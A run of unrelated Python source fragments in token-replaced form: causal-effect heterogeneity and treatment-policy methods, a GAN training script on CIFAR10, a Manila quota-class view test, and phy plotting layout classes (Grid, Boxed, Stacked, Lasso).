Index of the feature to be considered as treament max_depth : int, default 3 maximum depth of the tree min_samples_leaf : int, default 2 minimum number of samples on each leaf min_impurity_decrease : float, default 1e-4 The minimum decrease in the impurity/uniformity of the causal effect that a split needs to achieve to construct it include_model_uncertainty : bool, default False Whether to include confidence interval information when building a simplified model of the cate model. alpha : float in [0, 1], default 0.05 Confidence level of the confidence intervals displayed in the leaf nodes. A (1-alpha)*100% confidence interval is displayed. """<line_sep>intrp,feature_names,treatment_names,_=self._tree(<false> Xtest feature_index max_depth=max_depth min_samples_leaf=min_samples_leaf min_impurity_decrease=min_impurity_decrease include_model_uncertainty=include_model_uncertainty alpha=alpha)<line_sep><return>intrp.plot(feature_names=feature_names treatment_names=treatment_names)<block_end><def_stmt>_heterogeneity_tree_output self Xtest feature_index * max_depth=3 min_samples_leaf=2 min_impurity_decrease=1e-4 include_model_uncertainty=<false> alpha=0.05<block_start>""" Get an effect heterogeneity tree expressed as a dictionary. Parameters ---------- X : array-like Features feature_index Index of the feature to be considered as treament max_depth : int, optional (default=3) maximum depth of the tree min_samples_leaf : int, optional (default=2) minimum number of samples on each leaf min_impurity_decrease : float, optional (default=1e-4) The minimum decrease in the impurity/uniformity of the causal effect that a split needs to achieve to construct it include_model_uncertainty : bool, default False Whether to include confidence interval information when building a simplified model of the cate model. alpha : float in [0, 1], default 0.05 Confidence level of the confidence intervals displayed in the leaf nodes. A (1-alpha)*100% confidence interval is displayed. """<line_sep>intrp,feature_names,_,_=self._tree(<false> Xtest feature_index max_depth=max_depth min_samples_leaf=min_samples_leaf min_impurity_decrease=min_impurity_decrease include_model_uncertainty=include_model_uncertainty alpha=alpha)<def_stmt>hetero_data tree node_id node_dict<block_start><if_stmt>include_model_uncertainty<block_start><return>{'effect':_sanitize(tree.value[node_id]) 'ci':_sanitize(node_dict[node_id]['ci'])}<block_end><else_stmt><block_start><return>{'effect':_sanitize(tree.value[node_id])}<block_end><block_end><return>_tree_interpreter_to_dict(intrp feature_names hetero_data)<block_end><def_stmt>individualized_policy self Xtest feature_index * n_rows=<none> treatment_costs=0 alpha=0.05<block_start>""" Get individualized treatment policy based on the learned model for a feature, sorted by the predicted effect. Parameters ---------- Xtest: array-like Features feature_index: int or string Index of the feature to be considered as treatment n_rows: int, optional How many rows to return (all rows by default) treatment_costs: array-like, default 0 Cost of treatment, as a scalar value or per-sample. For continuous features this is the marginal cost per unit of treatment; for discrete features, this is the difference in cost between each of the non-default values and the default value (i.e., if non-scalar the array should have shape (n,d_t-1)) alpha: float in [0, 1], default 0.05 Confidence level of the confidence intervals A (1-alpha)*100% confidence interval is returned Returns ------- output: DataFrame Dataframe containing recommended treatment, effect, confidence interval, sorted by effect """<line_sep>result=self._safe_result_index(Xtest feature_index)<line_sep># get dataframe with all but selected column orig_df=pd.DataFrame(Xtest columns=self.feature_names_).rename(columns={self.feature_names_[result.feature_index]:'Current treatment'})<line_sep>Xtest=result.X_transformer.transform(Xtest)<if_stmt>Xtest.shape[1]<eq>0<block_start>x_rows=Xtest.shape[0]<line_sep>Xtest=<none><block_end><if_stmt>result.feature_baseline<is><none># apply 10% of a typical treatment for this feature <block_start>effect=result.estimator.effect_inference(Xtest T1=result.treatment_value<times>0.1)<block_end><else_stmt><block_start>effect=result.estimator.const_marginal_effect_inference(Xtest)<block_end><if_stmt>Xtest<is><none># we got a scalar effect although our original X may have had more rows <block_start>effect=effect._expand_outputs(x_rows)<block_end>multi_y=(<not>self._vec_y)<or>self.classification<if_stmt>multi_y<and>result.feature_baseline<is><not><none><and>np.ndim(treatment_costs)<eq>2# we've got treatment costs of shape (n, d_t-1) so we need to add a y dimension to broadcast safely <block_start>treatment_costs=np.expand_dims(treatment_costs 1)<block_end>effect.translate(-treatment_costs)<line_sep>est=effect.point_estimate<line_sep>est_lb=effect.conf_int(alpha)[0]<line_sep>est_ub=effect.conf_int(alpha)[1]<if_stmt>multi_y# y was an array, not a vector <block_start>est=np.squeeze(est 1)<line_sep>est_lb=np.squeeze(est_lb 1)<line_sep>est_ub=np.squeeze(est_ub 1)<block_end><if_stmt>result.feature_baseline<is><none><block_start>rec=np.empty(est.shape[0] dtype=object)<line_sep>rec[est<g>0]="increase"<line_sep>rec[est<le>0]="decrease"<line_sep># set the effect bounds; for positive treatments these agree with # the estimates; for negative treatments, we need to invert the interval eff_lb,eff_ub=est_lb est_ub<line_sep>eff_lb[est<le>0],eff_ub[est<le>0]=-eff_ub[est<le>0] -eff_lb[est<le>0]<line_sep># the effect is now always positive since we decrease treatment when negative eff=np.abs(est)<block_end><else_stmt># for discrete treatment, stack a zero result in front for control <block_start>zeros=np.zeros((est.shape[0] 1))<line_sep>all_effs=np.hstack([zeros est])<line_sep>eff_ind=np.argmax(all_effs axis=1)<line_sep>treatment_arr=np.array([result.feature_baseline]+[lvl<for>lvl result.feature_levels] dtype=object)<line_sep>rec=treatment_arr[eff_ind]<line_sep># we need to call effect_inference to get the correct CI between the two treatment options effect=result.estimator.effect_inference(Xtest T0=orig_df['Current treatment'] T1=rec)<line_sep># we now need to construct the delta in the cost between the two treatments and translate the effect current_treatment=orig_df['Current treatment'].values<if_stmt>np.ndim(treatment_costs)<ge>2# remove third dimenions potentially added <block_start><if_stmt>multi_y# y was an array, not a vector <block_start>treatment_costs=np.squeeze(treatment_costs 1)<block_end><assert_stmt>treatment_costs.shape[1]<eq>len(treatment_arr)-1 ("If treatment costs are an array, "<concat>" they must be of shape (n, d_t-1),"<concat>" where n is the number of samples"<concat>" and d_t the number of treatment"<concat>" categories.")<line_sep>all_costs=np.hstack([zeros treatment_costs])<line_sep># find cost of current treatment: equality creates a 2d array with True on each row, # only if its the location of the current treatment. Then we take the corresponding cost. current_cost=all_costs[current_treatment.reshape(-1 1)<eq>treatment_arr.reshape(1 -1)]<line_sep>target_cost=np.take_along_axis(all_costs eff_ind.reshape(-1 1) 1).reshape(-1)<block_end><else_stmt><block_start><assert_stmt>isinstance(treatment_costs (int float)) ("Treatments costs should either be float or "<concat>"a 2d array of size (n, d_t-1).")<line_sep>all_costs=np.array([0]+[treatment_costs]<times>(len(treatment_arr)-1))<line_sep># construct index of current treatment current_ind=(current_treatment.reshape(-1 1)<eq>treatment_arr.reshape(1 -1))@np.arange(len(treatment_arr))<line_sep>current_cost=all_costs[current_ind]<line_sep>target_cost=all_costs[eff_ind]<block_end>delta_cost=current_cost-target_cost<line_sep># add second dimension if needed for broadcasting during translation of effect <if_stmt>multi_y<block_start>delta_cost=np.expand_dims(delta_cost 1)<block_end>effect.translate(delta_cost)<line_sep>eff=effect.point_estimate<line_sep>eff_lb,eff_ub=effect.conf_int(alpha)<if_stmt>multi_y# y was an array, not a vector <block_start>eff=np.squeeze(eff 1)<line_sep>eff_lb=np.squeeze(eff_lb 1)<line_sep>eff_ub=np.squeeze(eff_ub 1)<block_end><block_end>df=pd.DataFrame({'Treatment':rec 'Effect of treatment':eff 'Effect of treatment lower bound':eff_lb 'Effect of treatment upper bound':eff_ub} index=orig_df.index)<line_sep><return>df.join(orig_df).sort_values('Effect of treatment' ascending=<false>).head(n_rows)<block_end><def_stmt>_individualized_policy_dict self Xtest feature_index * n_rows=<none> treatment_costs=0 alpha=0.05<block_start>""" Get individualized treatment policy based on the learned model for a feature, sorted by the predicted effect. Parameters ---------- Xtest: array-like Features feature_index: int or string Index of the feature to be considered as treatment n_rows: int, optional How many rows to return (all rows by default) treatment_costs: array-like, default 0 Cost of treatment, as a scalar value or per-sample alpha: float in [0, 1], default 0.05 Confidence level of the confidence intervals A (1-alpha)*100% confidence interval is returned Returns ------- output: dictionary dictionary containing treatment policy, effects, and other columns """<line_sep><return>self.individualized_policy(Xtest feature_index n_rows=n_rows treatment_costs=treatment_costs alpha=alpha).to_dict('list')<block_end><def_stmt>typical_treatment_value self feature_index<block_start>""" Get the typical treatment value used for the specified feature Parameters ---------- feature_index: int or string The index of the feature to be considered as treatment Returns ------- treatment_value : float The treatment value considered 'typical' for this feature """<line_sep>result=[res<for>res self._results<if>res.feature_index<eq>feature_index]<if_stmt>len(result)<eq>0<block_start><if_stmt>self._has_column_names<block_start>result=[res<for>res self._results<if>res.feature_name<eq>feature_index]<assert_stmt>len(result)<eq>1 f"Could not find feature with index/name {feature_index}"<line_sep><return>result[0].treatment_value<block_end><else_stmt><block_start><raise>ValueError(f"No feature with index {feature_index}")<block_end><block_end><return>result[0].treatment_value<block_end><block_end>
<import_stmt>argparse<import_stmt>copy<import_stmt>torch<import_from_stmt>torchvision.datasets MNIST CIFAR10<import_stmt>torchvision.transforms<as>TF<import_stmt>torchelie<as>tch<import_stmt>torchelie.loss.gan.hinge<as>gan_loss<import_from_stmt>torchelie.recipes.gan GANRecipe<import_stmt>torchelie.callbacks<as>tcb<import_from_stmt>torchelie.recipes Recipe<line_sep>parser=argparse.ArgumentParser()<line_sep>parser.add_argument('--cpu' action='store_true')<line_sep>opts=parser.parse_args()<line_sep>device='cpu'<if>opts.cpu<else>'cuda'<line_sep>BS=32<line_sep>tfms=TF.Compose([TF.Resize(64) tch.transforms.AdaptPad((64 64)) TF.RandomHorizontalFlip() TF.ToTensor()])<line_sep>ds=CIFAR10('~/.cache/torch/cifar10' download=<true> transform=tfms)<line_sep>dl=torch.utils.data.DataLoader(ds num_workers=4 batch_size=BS shuffle=<true>)<def_stmt>train_net Gen Discr<block_start>G=Gen(in_noise=128 out_ch=3)<line_sep>G_polyak=copy.deepcopy(G).eval()<line_sep>D=Discr()<line_sep>print(G)<line_sep>print(D)<def_stmt>G_fun batch<block_start>z=torch.randn(BS 128 device=device)<line_sep>fake=G(z)<line_sep>preds=D(fake<times>2-1).squeeze()<line_sep>loss=gan_loss.generated(preds)<line_sep>loss.backward()<line_sep><return>{'loss':loss.item() 'imgs':fake.detach()}<block_end><def_stmt>G_polyak_fun batch<block_start>z=torch.randn(BS 128 device=device)<line_sep>fake=G_polyak(z)<line_sep><return>{'imgs':fake.detach()}<block_end><def_stmt>D_fun batch<block_start>z=torch.randn(BS 128 device=device)<line_sep>fake=G(z)<line_sep>fake_loss=gan_loss.fake(D(fake<times>2-1))<line_sep>fake_loss.backward()<line_sep>x=batch[0]<line_sep>real_loss=gan_loss.real(D(x<times>2-1))<line_sep>real_loss.backward()<line_sep>loss=real_loss.item()+fake_loss.item()<line_sep><return>{'loss':loss 'real_loss':real_loss.item() 'fake_loss':fake_loss.item()}<block_end>loop=GANRecipe(G D G_fun D_fun G_polyak_fun dl log_every=100).to(device)<line_sep>loop.register('polyak' G_polyak)<line_sep>loop.G_loop.callbacks.add_callbacks([tcb.Optimizer(tch.optim.RAdamW(G.parameters() lr=1e-4 betas=(0. 0.99))) tcb.Polyak(G G_polyak) ])<line_sep>loop.register('G_polyak' G_polyak)<line_sep>loop.callbacks.add_callbacks([tcb.Log('batch.0' 'x') tcb.WindowedMetricAvg('real_loss') tcb.WindowedMetricAvg('fake_loss') tcb.Optimizer(tch.optim.RAdamW(D.parameters() lr=4e-4 betas=(0. 0.99))) ])<line_sep>loop.test_loop.callbacks.add_callbacks([tcb.Log('imgs' 'polyak_imgs') tcb.VisdomLogger('main' prefix='test')])<line_sep>loop.to(device).run(100)<block_end>train_net(tch.models.autogan_64 tch.models.snres_discr_4l)<line_sep>
# Copyright (c) 2017 Mirantis, Inc. # All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. <import_stmt>ddt<import_from_stmt>manila.api.openstack api_version_request<as>api_version<import_from_stmt>manila.api.views quota_class_sets<import_from_stmt>manila test<import_from_stmt>manila.tests.api fakes<line_sep>@ddt.ddt<class_stmt>ViewBuilderTestCase(test.TestCase)<block_start><def_stmt>setUp self<block_start>super(ViewBuilderTestCase self).setUp()<line_sep>self.builder=quota_class_sets.ViewBuilder()<block_end><def_stmt>test__collection_name self<block_start>self.assertEqual('quota_class_set' self.builder._collection_name)<block_end>@ddt.data(("fake_quota_class" "2.40") (<none> "2.40") ("fake_quota_class" "2.39") (<none> "2.39") ("fake_quota_class" "2.53") (<none> "2.53") ("fake_quota_class" "2.62") (<none> "2.62") )@ddt.unpack<def_stmt>test_detail_list_with_share_type self quota_class microversion<block_start>req=fakes.HTTPRequest.blank('/quota-sets' version=microversion)<line_sep>quota_class_set={"shares":13 "gigabytes":31 "snapshots":14 "snapshot_gigabytes":41 "share_groups":15 "share_group_snapshots":51 "share_networks":16 }<line_sep>expected={self.builder._collection_name:{"shares":quota_class_set["shares"] "gigabytes":quota_class_set["gigabytes"] "snapshots":quota_class_set["snapshots"] "snapshot_gigabytes":quota_class_set["snapshot_gigabytes"] "share_networks":quota_class_set["share_networks"] }}<if_stmt>quota_class<block_start>expected[self.builder._collection_name]['id']=quota_class<block_end><if_stmt>(api_version.APIVersionRequest(microversion)<ge>(api_version.APIVersionRequest("2.40")))<block_start>expected[self.builder._collection_name]["share_groups"]=quota_class_set["share_groups"]<line_sep>expected[self.builder._collection_name]["share_group_snapshots"]=quota_class_set["share_group_snapshots"]<block_end><if_stmt>req.api_version_request<ge>api_version.APIVersionRequest("2.53")<block_start>fake_share_replicas_value=46<line_sep>fake_replica_gigabytes_value=100<line_sep>expected[self.builder._collection_name]["share_replicas"]=(fake_share_replicas_value)<line_sep>expected[self.builder._collection_name]["replica_gigabytes"]=fake_replica_gigabytes_value<line_sep>quota_class_set['share_replicas']=fake_share_replicas_value<line_sep>quota_class_set['replica_gigabytes']=fake_replica_gigabytes_value<block_end><if_stmt>req.api_version_request<ge>api_version.APIVersionRequest("2.62")<block_start>fake_per_share_gigabytes=10<line_sep>expected[self.builder._collection_name]["per_share_gigabytes"]=fake_per_share_gigabytes<line_sep>quota_class_set['per_share_gigabytes']=fake_per_share_gigabytes<block_end>result=self.builder.detail_list(req quota_class_set quota_class=quota_class)<line_sep>self.assertEqual(expected result)<block_end><block_end>
# -*- coding: utf-8 -*- """Common layouts."""<line_sep>#------------------------------------------------------------------------------ # Imports #------------------------------------------------------------------------------ <import_stmt>logging<import_stmt>numpy<as>np<import_from_stmt>phylib.utils emit<import_from_stmt>phylib.utils.geometry get_non_overlapping_boxes get_closest_box<import_from_stmt>.base BaseLayout<import_from_stmt>.transform Scale Range Subplot Clip NDC<import_from_stmt>.utils _get_texture _in_polygon<import_from_stmt>.visuals LineVisual PolygonVisual<line_sep>logger=logging.getLogger(__name__)<line_sep>#------------------------------------------------------------------------------ # Grid #------------------------------------------------------------------------------ <class_stmt>Grid(BaseLayout)<block_start>"""Layout showing subplots arranged in a 2D grid. Constructor ----------- shape : tuple or str Number of rows, cols in the grid. shape_var : str Name of the GLSL uniform variable that holds the shape, when it is variable. box_var : str Name of the GLSL variable with the box index. has_clip : boolean Whether subplots should be clipped. Note ---- To be used in a grid, a visual must define `a_box_index` (by default) or another GLSL variable specified in `box_var`. """<line_sep>margin=.075<line_sep>n_dims=2<line_sep>active_box=(0 0)<line_sep>_scaling=(1. 1.)<def_stmt>__init__ self shape=(1 1) shape_var='u_grid_shape' box_var=<none> has_clip=<true><block_start>super(Grid self).__init__(box_var=box_var)<line_sep>self.shape_var=shape_var<line_sep>self._shape=shape<line_sep>ms=1-self.margin<line_sep>mc=1-self.margin<line_sep># Define the GPU transforms of the Grid layout. # 1. Global scaling. self.gpu_transforms.add(Scale(self._scaling gpu_var='u_grid_scaling'))<line_sep># 2. Margin. self.gpu_transforms.add(Scale((ms ms)))<line_sep># 3. Clipping for the subplots. <if_stmt>has_clip<block_start>self.gpu_transforms.add(Clip([-mc -mc +mc +mc]))<block_end># 4. Subplots. self.gpu_transforms.add(Subplot(# The parameters of the subplots are callable as they can be changed dynamically. shape=<lambda>:self._shape index=<lambda>:self.active_box shape_gpu_var=self.shape_var index_gpu_var=self.box_var))<block_end><def_stmt>attach self canvas<block_start>"""Attach the grid to a canvas."""<line_sep>super(Grid self).attach(canvas)<line_sep>canvas.gpu_transforms<augadd>self.gpu_transforms<line_sep>canvas.inserter.insert_vert(""" attribute vec2 {}; uniform vec2 {}; uniform vec2 u_grid_scaling; """.format(self.box_var self.shape_var) 'header' origin=self)<block_end><def_stmt>add_boxes self canvas shape=<none><block_start>"""Show subplot boxes."""<line_sep>shape=shape<or>self.shape<assert_stmt>isinstance(shape tuple)<line_sep>n,m=shape<line_sep>n_boxes=n<times>m<line_sep>a=1-.0001<line_sep>pos=np.array([[-a -a +a -a] [+a -a +a +a] [+a +a -a +a] [-a +a -a -a] ])<line_sep>pos=np.tile(pos (n_boxes 1))<line_sep>box_index=[]<for_stmt>i range(n)<block_start><for_stmt>j range(m)<block_start>box_index.append([i j])<block_end><block_end>box_index=np.vstack(box_index)<line_sep>box_index=np.repeat(box_index 8 axis=0)<line_sep>boxes=LineVisual()<line_sep># We exclude this interact when adding the visual. canvas.add_visual(boxes clearable=<false>)<line_sep>boxes.set_data(pos=pos)<line_sep>boxes.set_box_index(box_index)<line_sep>canvas.update()<block_end><def_stmt>get_closest_box self pos<block_start>"""Get the box index (i, j) closest to a given position in NDC coordinates."""<line_sep>x,y=pos<line_sep>rows,cols=self.shape<line_sep>j=np.clip(int(cols<times>(1.+x)/2.) 0 cols-1)<line_sep>i=np.clip(int(rows<times>(1.-y)/2.) 0 rows-1)<line_sep><return>i j<block_end><def_stmt>update_visual self visual<block_start>"""Update a visual."""<line_sep>super(Grid self).update_visual(visual)<if_stmt>self.shape_var<in>visual.program<block_start>visual.program[self.shape_var]=self._shape<line_sep>visual.program['u_grid_scaling']=self._scaling<block_end><block_end>@property<def_stmt>shape self<block_start>"""Return the grid shape."""<line_sep><return>self._shape<block_end>@shape.setter<def_stmt>shape self value<block_start>self._shape=value<line_sep>self.update()<block_end>@property<def_stmt>scaling self<block_start>"""Return the grid scaling."""<line_sep><return>self._scaling<block_end>@scaling.setter<def_stmt>scaling self value<block_start>self._scaling=value<line_sep>self.update()<block_end><block_end>#------------------------------------------------------------------------------ # Boxed #------------------------------------------------------------------------------ <class_stmt>Boxed(BaseLayout)<block_start>"""Layout showing plots in rectangles at arbitrary positions. Used by the waveform view. The boxes are specified via their center positions and optional sizes, in which case an iterative algorithm is used to find the largest box size that will not make them overlap. Constructor ---------- box_pos : array-like (2D, shape[1] == 2) Position of the centers of the boxes. box_var : str Name of the GLSL variable with the box index. keep_aspect_ratio : boolean Whether to keep the aspect ratio of the bounds. Note ---- To be used in a boxed layout, a visual must define `a_box_index` (by default) or another GLSL variable specified in `box_var`. """<line_sep>margin=.1<line_sep>n_dims=1<line_sep>active_box=0<line_sep>_box_scaling=(1. 1.)<line_sep>_layout_scaling=(1. 1.)<line_sep>_scaling_param_increment=1.1<def_stmt>__init__ self box_pos=<none> box_var=<none> keep_aspect_ratio=<false><block_start>super(Boxed self).__init__(box_var=box_var)<line_sep>self._key_pressed=<none><line_sep>self.keep_aspect_ratio=keep_aspect_ratio<line_sep>self.update_boxes(box_pos)<line_sep>self.gpu_transforms.add(Range(NDC <lambda>:self.box_bounds[self.active_box] from_gpu_var='vec4(-1, -1, 1, 1)' to_gpu_var='box_bounds'))<block_end><def_stmt>attach self canvas<block_start>"""Attach the boxed interact to a canvas."""<line_sep>super(Boxed self).attach(canvas)<line_sep>canvas.gpu_transforms<augadd>self.gpu_transforms<line_sep>canvas.inserter.insert_vert(""" #include "utils.glsl" attribute float {}; uniform sampler2D u_box_pos; uniform float n_boxes; uniform vec2 u_box_size; uniform vec2 u_layout_scaling; """.format(self.box_var) 'header' origin=self)<line_sep>canvas.inserter.insert_vert(""" // Fetch the box bounds for the current box (`box_var`). vec2 box_pos = fetch_texture({}, u_box_pos, n_boxes).xy; box_pos = (2 * box_pos - 1); // from [0, 1] (texture) to [-1, 1] (NDC) box_pos = box_pos * u_layout_scaling; vec4 box_bounds = vec4(box_pos - u_box_size, box_pos + u_box_size); """.format(self.box_var) 'start' origin=self)<block_end><def_stmt>update_visual self visual<block_start>"""Update a visual."""<line_sep>super(Boxed self).update_visual(visual)<line_sep>box_pos=_get_texture(self.box_pos (0 0) self.n_boxes [-1 1])<line_sep>box_pos=box_pos.astype(np.float32)<if_stmt>'u_box_pos'<in>visual.program<block_start>logger.log(5 "Update visual with interact Boxed.")<line_sep>visual.program['u_box_pos']=box_pos<line_sep>visual.program['n_boxes']=self.n_boxes<line_sep>visual.program['u_box_size']=np.array(self.box_size)<times>np.array(self._box_scaling)<line_sep>visual.program['u_layout_scaling']=self._layout_scaling<block_end><block_end><def_stmt>update_boxes self box_pos<block_start>"""Update the box positions and automatically-computed size."""<line_sep>self.box_pos,self.box_size=get_non_overlapping_boxes(box_pos)<block_end><def_stmt>add_boxes self canvas<block_start>"""Show the boxes borders."""<line_sep>n_boxes=len(self.box_pos)<line_sep>a=1+.05<line_sep>pos=np.array([[-a -a +a -a] [+a -a +a +a] [+a +a -a +a] [-a +a -a -a] ])<line_sep>pos=np.tile(pos (n_boxes 1))<line_sep>boxes=LineVisual()<line_sep>box_index=np.repeat(np.arange(n_boxes) 8)<line_sep>canvas.add_visual(boxes clearable=<false>)<line_sep>boxes.set_data(pos=pos color=(.5 .5 .5 1))<line_sep>boxes.set_box_index(box_index)<line_sep>canvas.update()<block_end># Change the box bounds, positions, or size #-------------------------------------------------------------------------- @property<def_stmt>n_boxes self<block_start>"""Total number of boxes."""<line_sep><return>len(self.box_pos)<block_end>@property<def_stmt>box_bounds self<block_start>"""Bounds of the boxes."""<line_sep>bs=np.array(self.box_size)<line_sep><return>np.c_[self.box_pos-bs self.box_pos+bs]<block_end><def_stmt>get_closest_box self pos<block_start>"""Get the box closest to some position."""<line_sep><return>get_closest_box(pos self.box_pos self.box_size)<block_end># Box scaling #-------------------------------------------------------------------------- <def_stmt>_increment_box_scaling self cw=1. ch=1.<block_start>self._box_scaling=(self._box_scaling[0]<times>cw self._box_scaling[1]<times>ch)<line_sep>self.update()<block_end>@property<def_stmt>box_scaling self<block_start><return>self._box_scaling<block_end><def_stmt>expand_box_width self<block_start><return>self._increment_box_scaling(cw=self._scaling_param_increment)<block_end><def_stmt>shrink_box_width self<block_start><return>self._increment_box_scaling(cw=1./self._scaling_param_increment)<block_end><def_stmt>expand_box_height self<block_start><return>self._increment_box_scaling(ch=self._scaling_param_increment)<block_end><def_stmt>shrink_box_height self<block_start><return>self._increment_box_scaling(ch=1./self._scaling_param_increment)<block_end># Layout scaling #-------------------------------------------------------------------------- <def_stmt>_increment_layout_scaling self cw=1. ch=1.<block_start>self._layout_scaling=(self._layout_scaling[0]<times>cw self._layout_scaling[1]<times>ch)<line_sep>self.update()<block_end>@property<def_stmt>layout_scaling self<block_start><return>self._layout_scaling<block_end><def_stmt>expand_layout_width self<block_start><return>self._increment_layout_scaling(cw=self._scaling_param_increment)<block_end><def_stmt>shrink_layout_width self<block_start><return>self._increment_layout_scaling(cw=1./self._scaling_param_increment)<block_end><def_stmt>expand_layout_height self<block_start><return>self._increment_layout_scaling(ch=self._scaling_param_increment)<block_end><def_stmt>shrink_layout_height self<block_start><return>self._increment_layout_scaling(ch=1./self._scaling_param_increment)<block_end><block_end><class_stmt>Stacked(Boxed)<block_start>"""Layout showing a number of subplots stacked vertically. Parameters ---------- n_boxes : int Number of boxes to stack vertically. box_var : str Name of the GLSL variable with the box index. origin : str top or bottom Note ---- To be used in a boxed layout, a visual must define `a_box_index` (by default) or another GLSL variable specified in `box_var`. """<line_sep>margin=0<line_sep>_origin='bottom'<def_stmt>__init__ self n_boxes box_var=<none> origin=<none><block_start>self._origin=origin<or>self._origin<assert_stmt>self._origin<in>('top' 'bottom')<line_sep>box_pos=self.get_box_pos(n_boxes)<line_sep>super(Stacked self).__init__(box_pos box_var=box_var keep_aspect_ratio=<false>)<block_end>@property<def_stmt>n_boxes self<block_start>"""Number of boxes."""<line_sep><return>len(self.box_pos)<block_end>@n_boxes.setter<def_stmt>n_boxes self n_boxes<block_start><if_stmt>n_boxes<ge>1<block_start>self.update_boxes(self.get_box_pos(n_boxes))<block_end><block_end><def_stmt>get_box_pos self n_boxes<block_start>"""Return the box bounds for a given number of stacked boxes."""<line_sep># Signal bounds. b=np.zeros((n_boxes 2))<line_sep>b[: 1]=np.linspace(-1 1 n_boxes)<if_stmt>self._origin<eq>'top'<block_start>b=b[::-1 :]<block_end><return>b<block_end>@property<def_stmt>origin self<block_start>"""Whether to show the channels from top to bottom (`top` option, the default), or from bottom to top (`bottom`)."""<line_sep><return>self._origin<block_end>@origin.setter<def_stmt>origin self value<block_start>self._origin=value<line_sep>self.update_boxes(self.get_box_pos(self.n_boxes))<line_sep>self.update()<block_end><def_stmt>attach self canvas<block_start>"""Attach the stacked interact to a canvas."""<line_sep>BaseLayout.attach(self canvas)<line_sep>canvas.gpu_transforms<augadd>self.gpu_transforms<line_sep>canvas.inserter.insert_vert(""" #include "utils.glsl" attribute float {}; uniform float n_boxes; uniform bool u_top_origin; uniform vec2 u_box_size; """.format(self.box_var) 'header' origin=self)<line_sep>canvas.inserter.insert_vert(""" float margin = .1 / n_boxes; float a = 1 - 2. / n_boxes + margin; float b = -1 + 2. / n_boxes - margin; float u = (u_top_origin ? (n_boxes - 1. - {bv}) : {bv}) / max(1., n_boxes - 1.); float y0 = -1 + u * (a + 1); float y1 = b + u * (1 - b); float ym = .5 * (y0 + y1); float yh = u_box_size.y * (y1 - ym); y0 = ym - yh; y1 = ym + yh; vec4 box_bounds = vec4(-1., y0, +1., y1); """.format(bv=self.box_var) 'before_transforms' origin=self)<block_end><def_stmt>update_visual self visual<block_start>"""Update a visual."""<line_sep>BaseLayout.update_visual(self visual)<if_stmt>'n_boxes'<in>visual.program<block_start>visual.program['n_boxes']=self.n_boxes<line_sep>visual.program['u_box_size']=self._box_scaling<line_sep>visual.program['u_top_origin']=self._origin<eq>'top'<block_end><block_end><block_end>#------------------------------------------------------------------------------ # Interactive tools #------------------------------------------------------------------------------ <class_stmt>Lasso(object)<block_start>"""Draw a polygon with the mouse and find the points that belong to the inside of the polygon."""<def_stmt>__init__ self<block_start>self._points=[]<line_sep>self.canvas=<none><line_sep>self.visual=<none><line_sep>self.box=<none><block_end><def_stmt>add self pos<block_start>"""Add a point to the polygon."""<line_sep>x,y=pos.flat<if>isinstance(pos np.ndarray)<else>pos<line_sep>self._points.append((x y))<line_sep>logger.debug("Lasso has %d points." len(self._points))<line_sep>self.update_lasso_visual()<block_end>@property<def_stmt>polygon self<block_start>"""Coordinates of the polygon vertices."""<line_sep>l=self._points<line_sep># Close the polygon. # l = l + l[0] if len(l) else l out=np.array(l dtype=np.float64)<line_sep>out=np.reshape(out (out.size<floordiv>2 2))<assert_stmt>out.ndim<eq>2<assert_stmt>out.shape[1]<eq>2<line_sep><return>out<block_end><def_stmt>clear self<block_start>"""Reset the lasso."""<line_sep>self._points=[]<line_sep>self.box=<none><line_sep>self.update_lasso_visual()<block_end>@property<def_stmt>count self<block_start>"""Number of vertices in the polygon."""<line_sep><return>len(self._points)<block_end><def_stmt>in_polygon self pos<block_start>"""Return which points belong to the polygon."""<line_sep><return>_in_polygon(pos self.polygon)<block_end><def_stmt>attach self canvas<block_start>"""Attach the lasso to a canvas."""<line_sep>canvas.attach_events(self)<line_sep>self.canvas=canvas<line_sep>self.create_lasso_visual()<block_end><def_stmt>create_lasso_visual self<block_start>"""Create the lasso visual."""<line_sep>self.visual=PolygonVisual()<line_sep>self.canvas.add_visual(self.visual clearable=<false>)<block_end><def_stmt>update_lasso_visual self<block_start>"""Update the lasso visual with the current polygon."""<if_stmt><not>self.visual<and>self.count<g>0<block_start><return><block_end># The following call updates a_box_index with the active box in BaseLayout. self.visual.set_data(pos=self.polygon)<line_sep>self.canvas.update()<block_end><def_stmt>on_mouse_click self e<block_start>"""Add a polygon point with ctrl+click."""<if_stmt>'Control'<in>e.modifiers<block_start><if_stmt>e.button<eq>'Left'<block_start>layout=getattr(self.canvas 'layout' <none>)<if_stmt>hasattr(layout 'box_map')<block_start>box,pos=layout.box_map(e.pos)<line_sep># Only update the box for the first click, so that the box containing # the lasso is determined by the first click only. <if_stmt>self.box<is><none><block_start>self.box=box<block_end># Avoid clicks outside the active box (box of the first click). <if_stmt>box<ne>self.box<block_start><return><block_end><block_end><else_stmt># pragma: no cover <block_start>pos=self.canvas.window_to_ndc(e.pos)<block_end># Force the active box to be the box of the first click, not the box of the # current click. <if_stmt>layout<block_start>layout.active_box=self.box<block_end>self.add(pos)# call update_lasso_visual emit("lasso_updated" self.canvas self.polygon)<block_end><else_stmt><block_start>self.clear()<line_sep>self.box=<none><block_end><block_end><block_end><def_stmt>__repr__ self<block_start><return>str(self.polygon)<block_end><block_end>
